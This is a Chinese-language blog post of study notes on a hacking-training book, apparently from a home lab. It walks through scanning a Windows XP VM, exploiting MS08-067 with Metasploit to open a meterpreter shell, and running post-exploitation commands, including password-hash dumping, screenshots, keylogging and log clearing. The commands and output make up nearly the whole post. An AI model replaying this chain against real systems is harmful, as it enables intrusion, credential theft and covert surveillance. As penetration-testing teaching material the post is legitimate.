cstriker1407的笔记本

好记性不如铅笔头

安全, 操作系统

某《魔鬼训练营》读书笔记:meterpreter

!!!笔记仅供学习交流使用,请勿进行其他用途!!!

首先找到一台有缺陷的windowsXP的主机:

#==>>首先查看下主机的版本和类型
root@kali:/usr/share/nmap/scripts# nmap -O 10.10.10.132

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-12 05:57 CST
Nmap scan report for 10.10.10.132
Host is up (0.00039s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:D9:80:89 (VMware)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.72 seconds

#==>>检测MS08-067漏洞,使用nmap的脚本进行检测
root@kali:/usr/share/nmap/scripts# nmap --script=smb-check-vulns  --script-args=unsafe=1 10.10.10.132

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-12 05:59 CST
Nmap scan report for 10.10.10.132
Host is up (0.00041s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:D9:80:89 (VMware)

Host script results:
| smb-check-vulns: 
|   MS08-067: VULNERABLE
|   Conficker: Likely CLEAN
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)

Nmap done: 1 IP address (1 host up) scanned in 7.71 seconds

使用metasploit来渗透:

msf > search ms08 #==>>搜索可用的模块

Matching Modules
================

   Name                                                   Disclosure Date          Rank       Description
   ----                                                   ---------------          ----       -----------
   exploit/windows/smb/ms08_067_netapi                    2008-10-28 00:00:00 UTC  great      MS08-067 Microsoft Server Service Relative Path Stack Corruption
。。。。。
msf > use exploit/windows/smb/ms08_067_netapi #==>>使用该模块
msf exploit(ms08_067_netapi) > show options #==>>查看选项

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > set RHOST 10.10.10.132 #==>>设置目标IP
RHOST => 10.10.10.132
msf exploit(ms08_067_netapi) > show targets #==>>设置目标系统类型

Exploit targets:

   Id  Name
   --  ----
。。。。。
   17  Windows XP SP2 Chinese - Simplified (NX)
。。。。。

msf exploit(ms08_067_netapi) > set target 17 #==>>设置为xpsp2
target => 17

msf exploit(ms08_067_netapi) > show payloads #==>>查看payloads

Compatible Payloads
===================

   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
。。。。。。
。。。。。。

直接使用meterpreter的payload:

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp #==>>使用最简单的meterpreter
payload => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > show options #==>>检查选项是否正常

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    10.10.10.132     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     10.10.10.132     no        The target address


Exploit target:

   Id  Name
   --  ----
   17  Windows XP SP2 Chinese - Simplified (NX)

msf exploit(ms08_067_netapi) > exploit #==>>exploit

[*] Started bind handler
[*] Attempting to trigger the vulnerability...
[*] Sending stage (769536 bytes) to 10.10.10.132
[*] Meterpreter session 1 opened (10.10.10.130:50685 -> 10.10.10.132:4444) at 2014-05-12 15:52:24 +0800

meterpreter >  #==>>成功

使用sessions的命令升级至meterpreter:

#==>>先看下sessions的命令:
msf exploit(ms08_067_netapi) > help sessions
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

    -K        Terminate all sessions #==>> 关闭所有的session
    -c <opt>  Run a command on the session given with -i, or all
    -d <opt>  Detach an interactive session
    -h        Help banner
    -i <opt>  Interact with the supplied session ID #==>> 切换到某个session
    -k <opt>  Terminate session
    -l        List all active sessions
    -q        Quiet mode
    -r        Reset the ring buffer for the session given with -i, or all
    -s <opt>  Run a script on the session given with -i, or all
    -u <opt>  Upgrade a win32 shell to a meterpreter session #==>> 将一个win32的控制台升级为meterpreter
    -v        List verbose fields
#==>>使用控制台的payload:
msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    10.10.10.132     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     10.10.10.132     no        The target address


Exploit target:

   Id  Name
   --  ----
   17  Windows XP SP2 Chinese - Simplified (NX)


msf exploit(ms08_067_netapi) > exploit -z #==>>exploit,成功后不进入交互模式,仍然保留在msf控制台
。。。。。。
。。。。。。
msf exploit(ms08_067_netapi) > sessions

Active sessions
===============

  Id  Type           Information  Connection
  --  ----           -----------  ----------
  1   shell windows 

msf exploit(ms08_067_netapi) > sessions -u 1 #==>>升级,作者估计原理是传一个exe的payload,但是作者的实验环境下没有成功。
。。。。。
。。。。。

meterpreter的常用命令:

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    migrate                   Migrate the server to another process
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

这里笔记下几个简单的:

meterpreter > hashdump #==>>获取hash
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:302db635a4c13c3a674a109f54ce6195:03cff5d10cb73f40d453df9752d7695b:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9de683d9acfe4e749affe8a19bcfa2fb:::
test:1003:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
user2:1004:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

meterpreter > screenshot #==>>截图
Screenshot saved to: /root/uLKnLFFN.jpeg

meterpreter > uictl #==>>控制键盘鼠标
Usage: uictl [enable/disable] [keyboard/mouse]
meterpreter > sysinfo #==>>获取系统信息
Computer        : WINXP-PRO-VM
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Meterpreter     : x86/win32

meterpreter > ps #==>>获取进程列表

Process List
============

 PID   PPID  Name               Arch  Session     User                          Path
 ---   ----  ----               ----  -------     ----                          ----
 0     0     [System Process]         4294967295                                
 4     0     System             x86   0           NT AUTHORITY\SYSTEM           
 184   672   alg.exe            x86   0           NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
。。。。。。。

meterpreter > getuid #==>>获取当前用户权限
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs #==>>尝试升级权限
============================================================
Enabled Process Privileges
============================================================
  SeDebugPrivilege
s  SeLockMemoryPrivilege
。。。。。
。。。。。
meterpreter > ipconfig #==>>IP地址

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1


Interface  2
============
Name         : AMD PCNET Family PCI Ethern...
Hardware MAC : 00:0c:29:d9:80:89
MTU          : 1500
IPv4 Address : 10.10.10.132
IPv4 Netmask : 255.255.255.0

meterpreter > pwd #==>>各种文件命令
C:\WINDOWS\system32
meterpreter > cd C:\
meterpreter > ls

Listing: C:\
============

Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
100777/rwxrwxrwx  0          fil   2010-01-30 14:25:12 +0800  AUTOEXEC.BAT
。。。。。。
。。。。。。
100666/rw-rw-rw-  42         fil   2014-05-18 21:17:56 +0800  test.txt

meterpreter > cat test.txt
Hello World From WinXP SP2

meterpreter > load extapi  #==>>加载其他的扩展模块
meterpreter > help  #==>>加载后可以看帮助
。。。。。。。
。。。。。。。
Extapi: Service Management Commands
===================================

    Command          Description
    -------          -----------
    service_control  Control a single service (start/pause/resume/stop/restart)
    service_enum     Enumerate all registered Windows services
    service_query    Query more detail about a specific Windows service
。。。。。。。
。。。。。。。
meterpreter > service_enum  #==>>枚举服务

Service List
============

PID   Status   Int  Name (Display Name)
---   ------   ---  -------------------
0     Stopped  N    alerter (Alerter)
。。。。。
。。。。。

meterpreter > run   #==>>可用的其他的脚本,很多
Display all 223 possibilities? (y or n)
。。。。。。
。。。。。。
meterpreter > run vnc  #==>>执行vnc脚本,也可以直接使用vnc的payload。

其他参考链接:

http://blog.csdn.net/emaste_r/article/details/17119093 】

http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics 】

http://helloeveryone.blog.51cto.com/6171143/1112040 】

http://hackwuhen.blog.51cto.com/6253667/1303733 】

Leave a Reply

13 + 18 =

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据

Theme by Anders Norén

苏ICP备16032087号